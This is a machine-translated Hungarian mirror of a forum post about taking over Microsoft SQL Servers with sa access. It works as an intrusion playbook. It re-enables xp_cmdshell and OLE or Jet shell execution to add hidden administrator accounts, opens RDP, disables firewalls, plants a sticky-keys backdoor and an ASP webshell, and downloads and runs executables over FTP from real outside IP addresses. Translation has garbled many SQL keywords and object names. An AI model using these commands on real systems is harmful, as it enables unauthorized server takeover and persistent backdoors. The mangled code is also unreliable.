Ez a cikk egy tükör gépi fordítás, kérjük, kattintson ide, hogy ugorjon az eredeti cikkre.

Nézet: 10941|Válasz: 2

SqlTOOLS (SQL átfogó használati eszköz), az interneten nincsenek források

[Linket másol]
Közzétéve 2015. 03. 18. 10:36:56 | | | |


1433-as javítási megrendelések

net user SQLDebugger list /add
net localgroup administrators SQLDebugger /add

Hibaüzenet: Nem találtam meg a tárolt eljárást 'master.. xp_cmdshell'。

Javítási módszer: nagyon általános, valójában a többi 126 127 együtt javítható,

Csakhogy xplog70.dll minden más ezzel a parancsgal megoldható

xp_cmdshell új helyreállítási módszerek
1. lépés: Törlés:
Drop eljárás sp_addextendedproc
Drop eljárás sp_oacreate
az exec sp_dropextendedproc 'xp_cmdshell'
Szerver: Msg 3701, 11. szint, 5-ös állapot, 1-es sor
Nem lehet eltávolítani a 'sp_addextendedproc' folyamatot, mert az nem létezik a rendszerkönyvtárban.
Szerver: Msg 3701, 11. szint, 5-es állapot, sp_dropextendedproc. eljárás, 18. sor
Nem lehet eltávolítani a 'xp_cmdshell' folyamatot, mert az nem létezik a rendszerkönyvtárban.
2. lépés: Felépülés:
dbcc addextendedproc ("sp_oacreate","odsole70.dll")
dbcc addextendedproc ("xp_cmdshell","xplog70.dll")
Közvetlen felépülés, függetlenül attól, hogy létezik-e sp_addextendedproc vagy sem.


xplog70.dll javítások:

Hibaüzenet: A DLL xplog70.dll vagy az általa hivatkozott DLL-ek egyike nem volt csatlakoztatható. Ok: 126 (A megadott modul nem található.) )。

Javítsd meg XPLOG70.DLL (először ellenőrizd a \x86\bin biztonsági mentési könyvtárat a fájllal, majd cseréld le a következő könyvtárat)

1. lépés
az exec sp_dropextendedproc 'xp_cmdshell'
2. lépés
DBCC addextendedproc ("xp_cmdshell","c:\sql2ksp4\x86\binn\xplog70.dll")


Nem találtam tárolt eljárást 'master.. xp_cmdshell'。
1. lépés:
Eljárás létrehozása 1996/08/30 20:13 sp_addextendedproc ---
@functname nvarchar(517),/* (tulajdonos.) A hívandó függvény neve

*/
@dllname varchar(255)/* függvényt tartalmazó DLL neve */
mint
Indítsd implicit_transactions
ha @@trancount > 0
Kezdeni
raiserror(15002,-1,-1,'sp_addextendedproc')
Visszatérés (1)
vége
dbcc addextendedproc( @functname, @dllname)
visszajelzés (0) -- sp_addextendedproc
MENJ

2. lépés:
EXEC sp_addextendedproc xp_cmdshell,@dllname ='xplog70.dll'declare @o int


Az SQL Server blokkolta a hozzáférést a 'xp_cmdshell' komponens 'sys.xp_cmdshell' folyamatához, mert ezt a komponenst a szerver biztonsági konfigurációjának részeként leállították. A rendszergazdák a sp_configure használatával engedélyezhetik az 'xp_cmdshell'-t. További információért a xp_cmdshell engedélyezéséről lásd a Peripheral App Configurator (Peripheral App Configurator) címet az SQL Server Online Books sorozatban.

; EXECUTIVE sp_configure 'mutasd meg a fejlett opciókat', 1 --
; ÚJRAKONFIGURÁLÁS FELÜLÍRÁSSAL --
; EXECUTIVE sp_configure 'xp_cmdshell', 1 --
; ÚJRAKONFIGURÁLÁS FELÜLÍRÁSSAL --
; EXECUTIVE sp_configure 'fejlett beállítások megjelenítése', 0 --


Távolítsd el az SQL veszélyes tárolóját:
DROP ELJÁRÁS sp_makewebtask
Végrehajtó mester.. sp_dropextendedproc xp_cmdshell
Végrehajtó mester.. sp_dropextendedproc xp_dirtree
Végrehajtó mester.. sp_dropextendedproc xp_fileexist
Végrehajtó mester.. sp_dropextendedproc xp_terminate_process
Végrehajtó mester.. sp_dropextendedproc sp_oamethod
Végrehajtó mester.. sp_dropextendedproc sp_oacreate
Végrehajtó mester.. sp_dropextendedproc xp_regaddmultistring
Végrehajtó mester.. sp_dropextendedproc xp_regdeletekey
Végrehajtó mester.. sp_dropextendedproc xp_regdeletevalue
Végrehajtó mester.. sp_dropextendedproc xp_regenumkeys
Végrehajtó mester.. sp_dropextendedproc xp_regenumvalues
Végrehajtó mester.. sp_dropextendedproc sp_add_job
Végrehajtó mester.. sp_dropextendedproc sp_addtask
Végrehajtó mester.. sp_dropextendedproc xp_regread
Végrehajtó mester.. sp_dropextendedproc xp_regwrite
Végrehajtó mester.. sp_dropextendedproc xp_readwebtask
Végrehajtó mester.. sp_dropextendedproc xp_makewebtask
Végrehajtó mester.. sp_dropextendedproc xp_regremovemultistring
Végrehajtó mester.. sp_dropextendedproc sp_OACreate
LEDOBÁSI ELJÁRÁS sp_addextendedproc


Kiterjesztett tárolt eljárások visszaállítása
Először a sp_addextendedproc visszaállítása, az állítás a következő:
Először:
Eljárás létrehozása 1996/08/30 20:13 sp_addextendedproc ---
@functname nvarchar(517),/* (tulajdonos.) a függvény neve */ @dllname varchar(255)/* DLL név, amely tartalmazza */ függvényt */ mint
Indítsd implicit_transactions
ha @@trancount > 0   
Kezdeni
raiserror(15002,-1,-1,'sp_addextendedproc')   
Visszatérés (1)   
vége
dbcc addextendedproc( @functname, @dllname)   
visszajelzés (0) -- sp_addextendedproc
MENJ

Másodszor:
Használd mestert   
az igazgató sp_addextendedproc xp_cmdshell, 'xp_cmdshell.dll'   
az sp_addextendedproc xp_dirtree exec 'xpstar.dll'   
az exec sp_addextendedproc xp_enumgroups, 'xplog70.dll'   
az exec sp_addextendedproc xp_fixeddrives, 'xpstar.dll'   
az sp_addextendedproc xp_loginconfig vezetője: 'xplog70.dll'   
az exec sp_addextendedproc xp_enumerrorlogs, 'xpstar.dll'   
az exec sp_addextendedproc xp_getfiledetails, 'xpstar.dll'   
az sp_addextendedproc sp_OACreate "odsole70.dll"   
az exec sp_addextendedproc sp_OADestroy, 'odsole70.dll'   
az sp_addextendedproc sp_OAGetErrorInfo vezetője: 'odsole70.dll'   
az exec sp_addextendedproc sp_OAGetProperty, 'odsole70.dll'   
az exec sp_addextendedproc sp_OAMethod, 'odsole70.dll'   
az exec sp_addextendedproc sp_OASetProperty, 'odsole70.dll'   
az exec sp_addextendedproc sp_OAStop, 'odsole70.dll'   
az exec sp_addextendedproc xp_regaddmultistring, 'xpstar.dll'   
az exec sp_addextendedproc xp_regdeletekey, 'xpstar.dll'   
az exec sp_addextendedproc xp_regdeletevalue, 'xpstar.dll'   
az exec sp_addextendedproc xp_regenumvalues, 'xpstar.dll'   
az exec sp_addextendedproc xp_regread, 'xpstar.dll'   
az exec sp_addextendedproc xp_regremovemultistring, 'xpstar.dll'   
az sp_addextendedproc xp_regwrite vezetője: 'xpstar.dll'   
az exec sp_addextendedproc xp_availablemedia, 'xpstar.dll'


Töröld azt az utasítást, amely kiterjeszti a tárolt eljárást xp_cmdshell:
az exec sp_dropextendedproc 'xp_cmdshell'


A cmdshell SQL utasításának visszaállítása
exec sp_addextendedproc xp_cmdshell ,@dllname ='xplog70.dll'

Nyisd meg a cmdshell SQL utasítást
exec sp_addextendedproc xp_cmdshell ,@dllname ='xplog70.dll'

Megállapítsuk, létezik-e tárolóbővítés
Válassz count(*) a master.dbo.sysobjects fájlból, ahol xtype='x' és name='xp_cmdshell'
A visszaadás eredménye 1, és rendben van

Visszaállítás xp_cmdshell
exec master.dbo.addextendedproc 'xp_cmdshell','xplog70.dll'; Válassz count(*) a master.dbo.sysobjects fájlból, ahol xtype='x' és name='xp_cmdshell'
A visszaadás eredménye 1, és rendben van
Ellenkező esetben töltsd fel xplog7.0.dll
exec master.dbo.addextendedproc 'xp_cmdshell','c:\winnt\system32\xplog70.dll'


Blokkoljuk a cmdshell SQL utasítását
sp_dropextendedproc "xp_cmdshell


Egy. Az SA jelszó módszerének megváltoztatása:
Az SQL Comprehensive Utilization Tool-hoz való csatlakozás után hajtsd végre a parancsot:
exec sp_password NULL, 'új jelszó', 'sa'
(Tipp: óvatosan használd!)


Kettő. Egyszerűen javítsd ki a gyenge jelszót.

1. módszer: Lekérdezés a splitterre a csatlakozás után:
ha létezik (válassz * from
dbo.sysobjects , ahol id = object_id(N'[dbo].[ xp_cmdshell]') és
OBJECTPROPERTY(id, N'IsExtendedProc') = 1)

az sp_dropextendedproc N'[dbo] vezetője. [xp_cmdshell]'

MENJ
Ezután nyomd meg az F5 billentyűt, hogy végrehajtsd a parancsot


2. módszer: Lekérdezés a splitter csatlakoztatása után
Az első lépés a végrehajtás: használd a mastert
2. lépés: sp_dropextendedproc 'xp_cmdshell'
Ezután nyomd meg az F5 billentyűt, hogy végrehajtsd a parancsot

A DLL xpsql70.dll vagy az általa hivatkozott DLL egyike nem szerelhető fel. 126-os ok (A megadott modul nem található. )
Helyreállítási módszer: A splitter kapcsolat lekérdezése után,
1. lépés: sp_dropextendedproc "xp_cmdshell"
2. lépés: sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll'


A funkció xp_cmdshell nem található meg a könyvtárban xpweb70.dll. Ok: 127 (A megadott program nem található.) )
Helyreállítási módszer: A splitter kapcsolat lekérdezése után,
1. lépés: Végrehajtás: végrehajtó sp_dropextendedproc 'xp_cmdshell'
2. lépés: az sp_addextendedproc 'xp_cmdshell', 'xpweb70.dll'            
Ezután nyomd meg az F5 billentyűt, hogy végrehajtsd a parancsot

Ha a fenti módszerek egyike sem visszanyerhető, kérjük, próbálja meg közvetlenül hozzáadni a fiókot az alábbi módszerekkel:
Miután lekérdeztem a splitter kapcsolatot,
2000Servser rendszer:
deklarare @shell int exec sp_oacreate 'wscrip remove t.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd.exe /c net user Web hacker /add'

Declare @shell int exec sp_oacreate 'wscrip remove t.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd.exe /c net localgroup administrators Web /add'

XP vagy 2003 Server rendszer: 126 hiba! rend

declare @shell int exec sp_oacreate 'wscrip remove t.shell', @shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net user Web$ hacker /add'

deklarare @shell int exec sp_oacreate 'wscrip remove t.shell', @shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net localgroup administrators Web$ /add'


C:\>DIR C:\
Az SQL Server blokkolta a hozzáférést a 'xp_cmdshell' komponens 'sys.xp_cmdshell' folyamatához, mert ezt a komponenst a szerver biztonsági konfigurációjának részeként leállították. A rendszergazdák a sp_configure használatával engedélyezhetik az 'xp_cmdshell'-t. További információért a xp_cmdshell engedélyezéséről lásd a Peripheral App Configurator (Peripheral App Configurator) címet az SQL Server Online Books sorozatban.

Az elemző által végrehajtott utasítások:

EXEC sp_configure 'fejlett beállítások megjelenítése', 1; ÚJRAKONFIGURÁLÁS; EXECUTIVE sp_configure 'xp_cmdshell', 1; ÚJRAKONFIGURÁLÁS;


Néha, amikor a fenti utasításokat lekérdezés-leszerelő kapcsolattal futtatjuk, a tárolt eljárás nem található meg sp_addextendedproc

Megoldás:

Eljárás létrehozása 1996/08/30 20:13 sp_addextendedproc ---
@functname nvarchar(517),/* (tulajdonos.) A hívandó függvény neve */
@dllname varchar(255)/* függvényt tartalmazó DLL neve */
mint
Indítsd implicit_transactions
ha @@trancount > 0
Kezdeni
raiserror(15002,-1,-1,'sp_addextendedproc')
Visszatérés (1)
vége
dbcc addextendedproc( @functname, @dllname)
visszajelzés (0) -- sp_addextendedproc
MENJ
Ezt a kódot beillesztik a lekérdezés-elosztóba és futtatják

Felfedező:
c:\windows\explorer.exe


Tekintse meg a tartalomjegyzéket
Executive master.dbo.xp_subdirs 'c:\'
Lista lemezek
Végrehajtó mester.. xp_fixeddrives


xpsql.cpp: 错误 5 来自 CreateProcess(第 737 行) 直接加帐号!

EXECUTIVE master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SoftWare\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',0
Válassz * from OpenRowSet('Microsoft.Jet.OLEDB.4.0','; Database=c:\windows\system32\ias\ias.mdb','select shell("net user 123 123 /add")');
Válassz * from OpenRowSet('Microsoft.Jet.OLEDB.4.0','; Database=c:\windows\system32\ias\ias.mdb','select shell("net localgroup administrators 123 /add")');

echo Windows Registry Editor Version 5.00 >3389.reg
Visszhang. >>3389.reg
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\netcache] >>3389.reg
echo "Enabled"="0" >>3389.reg
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon] >>3389.reg
echo "ShutdownWithoutLogon"="0" >>3389.reg
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer] >>3389.reg
echo "EnableAdminTSRemote"=dword:00000001 >>3389.reg
visszhang [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server] >>3389.reg
visszhang "TSEnabled"=dword:00000001 >>3389.reg
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermDD] >>3389.reg
echo "Start"=dword:00000002 >>3389.reg
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermService] >>3389.reg
echo "Start"=dword:00000002 >>3389.reg
visszhang [HKEY_USERS\. DEFAULT\Billentyűzet elrendezése\Kapcsoló] >>3389.reg
echo "Hotkey"="1" >>3389.reg
visszhang [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp] >>3389.reg
echo "PortNumber"=dword:00000D3D >>3389.reg
visszhang [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp] >>3389.reg
echo "PortNumber"=dword:00000D3D >>3389.reg
regedit /s 3389.reg

Nyitva 3389:

exec master.dbo.xp_regwrite'HKEY_LOCAL_MACHINE','SYSTEM\CurrentControlSet\Control\Terminal Server','fDenyTSConnections','REG_DWORD',0; --


3389-es passz:

exec master.dbo.xp_regwrite'HKEY_LOCAL_MACHINE','SYSTEM\CurrentControlSet\Control\Terminal Server','fDenyTSConnections','REG_DWORD',1;

Nézd meg a 3389-es portot

exec xp_regread 'HKEY_LOCAL_MACHINE','SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp','PortNumber'


Normál CMD hátsó ajtó
xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe','debugger','reg_sz','c:\windows\system32\cmd.exe'


A win2K közvetlenül a PS Mar-hoz kerül
Végrehajtó mester.. xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',1
Válassz * from openrowset('microsoft.jet.oledb.4.0','; database=c:\winnt\system32\ias\ias.mdb','select shell("cmd.exe /c @echo open 60.190.176.85>>net.txt&@echo reconditeness>>net.txt&@echo 7259>>net.txt&@echo get 0.exe>>net.txt& @echo viszlát>>net.txt&@ftp -s:net.txt&del net.txt & 0.exe")')

win03-XP közvetlenül PS lovakon
Végrehajtó mester.. xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',1
Válassz * from openrowset('microsoft.jet.oledb.4.0','; database=c:\windows\system32\ias\ias.mdb','select shell("cmd.exe /c @echo open 60.190.176.85>>net.txt&@echo reconditeness>>net.txt&@echo 7259>>net.txt&@echo get 0.exe>>net.txt& @echo viszlát>>net.txt&@ftp -s:net.txt&del net.txt & 0.exe")')

5. Kapcsold át a hátsó ajtó parancsot
declène @o int
exec sp_oacreate 'scrip remove ting.filesystemobject', @o out
exec sp_oamethod @o, 'copyfile',null,'c:\windows\explorer.exe' ,'c:\windows\system32\sethc.exe';

declène @o int
exec sp_oacreate 'scrip remove ting.filesystemobject', @o out
exec sp_oamethod @o, 'copyfile',null,'c:\windows\system32\sethc.exe' ,'c:\windows\system32\dllcache\sethc.exe';

Másolj c:\windows\explorer.exe c:\windows\system32\sethc.exe
Másolj c:\windows\system32\sethc.exe c:\windows\system32\dllcache\sethc.exe

declène @o int
Végrehajtó sp_oacreate 'WSCRIP távolítsa el a t.shell', @o
exec sp_oamethod @o, 'run', NULL, 'XXXXX' \\XXXXX az, amit végrehajtani szeretnél

Írd meg a regiszterben megadott kulcsban megadott értéket), a metódussal (bbb írás a HKEY_LOCAL_MACHINE\SOFTWARE\aaa\aaaValue kulcsba):

EXECUTIVE mester.. xp_regwrite

@rootkey='HKEY_LOCAL_MACHINE',

@key='SOFTWARE\AAA',

@value_name='aaaValue',

@type='REG_SZ',

@value='bbb'


@echo open 121.22.56.5>c:\bin.txt&@echo list>>c:\bin.txt&@echo list>>c:\bin.txt&@echo get gzn.exe>>c:\bin.txt&@echo bye>>c:\bin.txt&@ftp -s:c:\bin.txt&del c:\bin.txt&gzn.exe& gzn.exe&gzn.exe


Először másold ftp.exe a wmpub könyvtárba
@echo CD c:\wmpub\>c:\wmpub\in.bat&@echo ftp -s:c:\wmpub\xiuxiu.txt>>c:\wmpub\in.bat

Nyitva 3389
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 0 /f


C:\WINDOWS\system32\dllcache\net1.exe localgroup administrators IUSR_SERVER /add

SQL mondatot ír
exec master.dbo.xp_subdirs 'd:\web\cdlxkj';
exec sp_makewebtask 'd:\web\cdlxkj\XX.asp','select''<%execute(request("SB"))%>'' '

SA Sandbox mód promóció -----
----------------------
Végrehajtó mester.. xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',0;
-------------------------------------------------------
Válassz * from OpenRowSet('Microsoft.Jet.OLEDB.4.0','; Database=c:\windows\system32\ias\ias.mdb','select shell("net user sql$ 123 /add")');
-------------------------------------------------------
Válassz * from OpenRowSet('Microsoft.Jet.OLEDB.4.0','; Database=c:\windows\system32\ias\ias.mdb','select shell("net localgroup administrators sql$ /add")');

3389-ES MŰSZAK

A mondat a következőket használta:
Invázió
EXECUTIVE mester.. xp_regwrite
@rootkey='HKEY_LOCAL_MACHINE',
@key='SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image fájl végrehajtási opciók\sethc. EXE',
@value_name='Debugger',
@type='REG_SZ',
@value='C:\WINDOWS\explorer.exe'

Helyreállítás
EXECUTIVE mester.. xp_regwrite
@rootkey='HKEY_LOCAL_MACHINE',
@key='SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image fájl végrehajtási opciók\sethc. EXE',
@value_name='Debugger',
@type='REG_SZ',
@value=''


Képeltérítés

EXECUTIVE mester.. xp_regwrite --- ez a regiszterszerkesztés!
@rootkey='HKEY_LOCAL_MACHINE', ---Ez a pozíció!
@key='SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image fájl végrehajtási opciók\sethc. EXE', -----Ez is a pozíció!
@value_name='Debugger', --- ez az asztal neve!
@type='REG_SZ', --- itt van az írás jelentése!
@value='C:\WINDOWS\explorer.exe' ---- itt van az írott tartalom!

Az egész folyamat a mester használata: xp_regwrite ez a komponens elkészült,

1.sql parancs, hogy megkérdezzék, a regisztrációs ragasztott kulcsot eltérítették-e

Végrehajtó mester.. xp_regread 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe','Debugger'

2.sql parancs eltéríti a registry sticky key funkciót, és helyette a feladatkezelőre (persze lecserélheted más parancsokkal is).

xp_regwrite 'HKEY_LOCAL_MACHINE', 'SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image fájl végrehajtási opciók\sethc.exe',
'Debugger','REG_SZ','C:\WINDOWS\system32\taskmgr.exe'

3.sql parancs, amellyel eltávolítod a regisztrációs kulcs eltérítési funkcióját, megvédi a szerveredet attól, hogy mások kihasználják

xp_regdeletekey 'HKEY_LOCAL_MACHINE', 'SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image fájl végrehajtási opciók\sethc.exe'


SQL Write fájlok

declare @o int, @f int, @t int, @ret int
exec sp_oacreate 'scrip remove ting.filesystemobject', @o out
exec sp_oamethod @o, 'createtextfile', @f out, 'c:\1.vbs', 1
exec @ret = sp_oamethod @f, 'writeline', NULL,'set wsnetwork=CreateObject("Wscrip remove t.NETWORK")'
exec @ret = sp_oamethod @f, 'writeline', NULL,'os="WinNT://"&wsnetwork. ComputerName'
exec @ret = sp_oamethod @f, 'writeline', NULL,'Set ob=GetObject(os)'
exec @ret = sp_oamethod @f, 'writeline', NULL,'Set oe=GetObject(os&"/Administrators,group")'
exec @ret = sp_oamethod @f, 'writeline', NULL,'Set od=ob. Create("user","test")'
exec @ret = sp_oamethod @f, 'writeline', NULL,'od. SetPassword "1234"'
exec @ret = sp_oamethod @f, 'writeline', NULL,'od. SetInfo '
exec @ret = sp_oamethod @f, 'writeline', NULL,'Set of=GetObject(os&"/test",user) '
exec @ret = sp_oamethod @f, 'writeline', NULL,'oe.add os&"/test"'


Szkriptek NET eszkaláció nélkül

struser=wscrip eltávolítja t.arguments(0)
strpass=wscrip eltávolításához t.arguments(1)

set lp=createObject("Wscrip remove t.NETWORK")
oz="WinNT://"&lp. ComputerName
Set ob=GetObject(oz)
Set oe=GetObject(oz&"/Administrators,group")
Set od=ob.create("user",struser)
OD. SetPassword strpass
OD. SetInfo
Set of=GetObject(oz&"/" & struser & ",user")
Oe. Add(of. ADsPath)

Minden adminisztrátor az OE-ben. Tagok
if struser=admin. Nevezd el akkor.
A Wscrip eltávolította a t.echo struser és a "Sikeresen létrehozva!"
WSCRIP eltávolítja a T.quit
vége ha
Következő

Wscrip remove t.echo struser & "User establishment failed!"
Mentsd el a fentieket felhasználóként. VBS fájl
Ezután futtatd a cscrip használatát, hogy eltávolítsd a user.vbs felhasználónév jelszavát


A JET sandbox mód használatával megoldhatod a tárolt eljárások, például a XP_cmdshell és kapcsolódó dinamikus link könyvtárak által okozott problémákat. Biztonsági okokból a rendszer alapértelmezetten nem kapcsolja be a sandbox módot, ami xp_regwrite megköveteli, hogy bekapcsolja a homokozó módot:

Exec master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0
\Motorok','SandBoxMode','REG_DWORD',1

Ezután hajtsuk végre a sandbox parancsot, hogy hozzáadj egy felhasználónevű tesztet a 1234-es jelszóval a rendszerhez:

Válassz * from openrowset('microsoft.jet.oledb.4.0','; database=c:\windows
\system32\ias\ias.mdb','select shell("cmd.exe /c net user test 1234 /add")')

Válassz * from openrowset('microsoft.jet.oledb.4.0','; database=c:\windows
\system32\ias\ias.mdb','select shell("cmd.exe /c net localgroup
adminisztrátorok tesztelik /add")')

A különböző operációs rendszerek eltérő útvonalakat használnak, és a helyzethez igazítani kell:

NT/2K: c:\winnt\system32\
XP/2003: c:\windows\system32\

Ezen felül a Microsoft SQL Server 2005-ben egyes tárolt eljárások alapértelmezés szerint zárva vannak, és parancsokat kell megnyitniuk:

Kapcsold be XP_cmdshell:

EXEC sp_configure 'fejlett beállítások megjelenítése', 1; ÚJRAKONFIGURÁLÁS; EXECUTIVE sp_configure
'xp_cmdshell', 1; ÚJRAKONFIGURÁLÁS;

Nyisd meg az 'OPENROWSET'-et:

exec sp_configure 'fejlett beállítások megjelenítése', 1; ÚJRAKONFIGURÁLÁS; Executive sp_configure
'Ad hoc terjesztett lekérdezések',1; ÚJRAKONFIGURÁLÁS;

Kapcsold be a 'sp_oacreate'-et:

exec sp_configure 'fejlett beállítások megjelenítése', 1; ÚJRAKONFIGURÁLÁS; Executive sp_configure
'Ole automatizálási eljárások',1; ÚJRAKONFIGURÁLÁS;

Íme néhány helyzet, amikor a végrehajtási parancs a sa alatt hibás:
1. A DLL xpsql70.dll vagy a DLL által hivatkozott DLL nem tölthető. 126-os ok (A megadott modul nem található. )
Ez a helyzet viszonylag gyakori, és a javítás egyszerű, de vannak feltételek. Ha ebben az esetben fel tudod tüntetni a könyvtárat (a sqltools v2.0-nál van egy könyvtár funkció), Gratulálok ehhez a 80%-os helyzethez, hogy megoldható, ha fel tudod tüntetni a könyvtárat, akkor csak keresd meg a xplog70.dll útvonalat, és hajtsd végre a következő parancsot.
1. lépés
exec sp_dropextendedproc 'xp_cmdshell' (ez a parancs az eredeti cmdshell törlése, mert már elromlott)
2. lépés
dbcc addextendedproc ("xp_cmdshell","c:\Program Files\Microsoft SQL Server\MSSQL\Binn\xplog70.dll")
; EXECUTIVE sp_configure 'fejlett opciókat mutat', 0 –
Természetesen ez egy SQL parancs, amelyet lekérdezési analizátorral hajtanak végre. A c:\Program Files\Microsoft SQL Server\MSSQL\Binn\xplog70.dll a második lépésben a xplog70.dll útvonala, ez az út viszonylag gyakori, ha a c meghajtón nincs ilyen, más meghajtó betűket is találhatsz.
2. Nem találom meg a xp_cmdshell funkciót a könyvtárban xpweb70.dll. Ok: 127 (A megadott program nem található.) )
Valójában ez ugyanaz, mint a fenti 126, vagyis a cmdshell hibás, amíg megtalálod a biztonsági mentést xplog70.dll kövesd a fenti módszert a javításhoz.
3. Nem találták meg a tárolt eljárást, a 'mester'. XPCMDSHELL'
Ebben az esetben az interneten látom, hogy a módszer a következő:
1. lépés: Törlés:
Drop eljárás sp_addextendedproc
Drop eljárás sp_oacreate
az exec sp_dropextendedproc 'xp_cmdshell'
2. lépés: Felépülés:
dbcc addextendedproc ("sp_oacreate","odsole70.dll")
dbcc addextendedproc ("xp_cmdshell","xplog70.dll")
Valójában ez még mindig ugyanaz, mint a fentiek, sőt, ha óvatos vagy, a fenti 126 127 csak a tárolt eljárást nem találja meg a 'master:). XPCMDSHELL', mert az első lépés a cmdshell tárolt eljárásának törlése. Ebben az esetben csak kövesd a fent említett második lépést.
4. Hibaüzenet: Az SQL Server blokkolta a hozzáférést a 'xp_cmdshell' komponens 'sys.xp_cmdshell'-jéhez, mert ezt a komponenst a szerver biztonsági konfigurációjának részeként leállították. A rendszergazdák a sp_configure használatával engedélyezhetik az 'xp_cmdshell'-t. További információért a xp_cmdshell engedélyezéséről lásd a Peripheral App Configurator (Peripheral App Configurator) címet az SQL Server Online Books sorozatban.
Ez a helyzet a legegyszerűbb, mert nem kell semmire gondolkodni, csak végrehajtod a következő parancsot
; EXECUTIVE sp_configure 'mutasd meg a fejlett opciókat', 1 --
; ÚJRAKONFIGURÁLÁS FELÜLÍRÁSSAL --
; EXECUTIVE sp_configure 'xp_cmdshell', 1 --
; ÚJRAKONFIGURÁLÁS FELÜLÍRÁSSAL --
; EXECUTIVE sp_configure 'fejlett opciókat mutat', 0 –

A fenti javítás után végrehajthatod a cmd parancsot, és elkezded emelni az erődet. Általában először az IP-t nézem meg, hogy intranet-e, majd REG lekérdezést kérek a HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\WinStations\RDP-Tcp /v PortNumber a terminál portjának ellenőrzésére, majd netstat –an, hogy megnézzem, nyitva van-e a terminál, majd a net felhasználói jelszót / Add hozzá egy felhasználót, majd net-localgroup adadrátorok user /add Ha minden jól megy, ez lebontja a szervert. De sok probléma van a folyamat során.
1. A nettó teljesítmény előállítása sikeres, de nem tud csatlakozni a terminálhoz. A következő helyzetek vannak
(1) A szerver az intraneten van.
(2) TCP/IP szűrés.
Először a következő parancsparancsot hajtsd végre:
cmd /c regedit -e c:\1.reg HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Tcpip, exportáld a regiszter első részét TCP/IP szűréshez
cmd /c regedit -e c:\2.reg HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\Tcpip, exportáld a regiszterkönyv második részét TCP/IP szűréshez
cmd /c regedit -e c:\3.reg HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip", exportálva a TCP/IP szűrésről szóló harmadik helyet a nyilvántartásban
Ezután menj vissza a c meghajtóhoz 1.reg, 2.reg, 3.reg, töltsd le a 1.reg-t, 2.reg, 3.reg vissza a merevlemezedre szerkesztéshez, keresd meg az EnableSecurityFilters mezőt, hogy megnézd, a dword utáni kulcsérték 000000000, ha 00000001, az azt jelenti, hogy az adminisztrátor tcp/ip szűrést végezt, csak 1-et kell 0-ra, 2-re változtatni. Reg és 3.reg ugyanazokat a változtatásokat hajtják végre.
(3) Hozz létre IP biztonsági szabályzatot.
Futtasd le a cmd parancsot: cmd /c net stop policyagent az IPSEC Services szolgáltatás megállításához. Kapcsold be újra a terminált.
(4) Az adminisztrátor által beállított terminál bejelentkezési engedélyét csak a megadott felhasználó használhatja.
(5) Tűzfal. Futtatd a cmd parancsot: net stop alg /ynet stop sharedaccess

2. NET eszkaláció jelenik meg, és a hozzáférést megtagadják
Próbálkozhatsz net1 felhasználói jelszóval /add Ha a net1 szintén megtagadja a hozzáférést, másolhatsz egy shfit backdoor-t, és megpróbálhatod végrehajtani a cmd parancsot: copy c:\windows\explorer.exe c:\windows\system32\sethc.exe
Másolj c:\windows\system32\sethc.exe c:\windows\system32\dllcache\sethc.exe
Ha kérnek, másold ki az 1 fájlt, ami sikeresnek bizonyul. Csatlakozz a terminálhoz, és nyomd meg az 5 shift gombot, hogy lásd, mi jelenik meg. Játssz Kaka Explorerrel, most csak kézzel adj hozzá egy felhasználót.
3. Net-ekaláció történik hozzáférési elutasítási hibával 5 (kiemelés)
Ebben az esetben nem kell kipróbálnod a net1-et, próbálkozhatsz a copy shift backdoor-nal, ha a másolás felszólítja a 0 fájl másolását, az bizonyítja, hogy nem sikeres. Ezután megpróbálhatod feltölteni, ha fel tudod tölteni, közvetlenül küldhetsz egy nem-hálózati power escalation eszközt, ami már rég jelent meg, és hozzáadhatsz egy felhasználót. De ezek a legtöbb eset nem tölthető, ezért gondolkodni kell rajta. Mivel a cmd futtatható, akkor a fájl letölthető cmd-n keresztül ftp alatt, de az ftp alapja az, hogy szöveget vagy köteges feldolgozást lehessen írni. Ezután írhatsz egy szöveget vagy csomagot egy SQL utasításon keresztül.
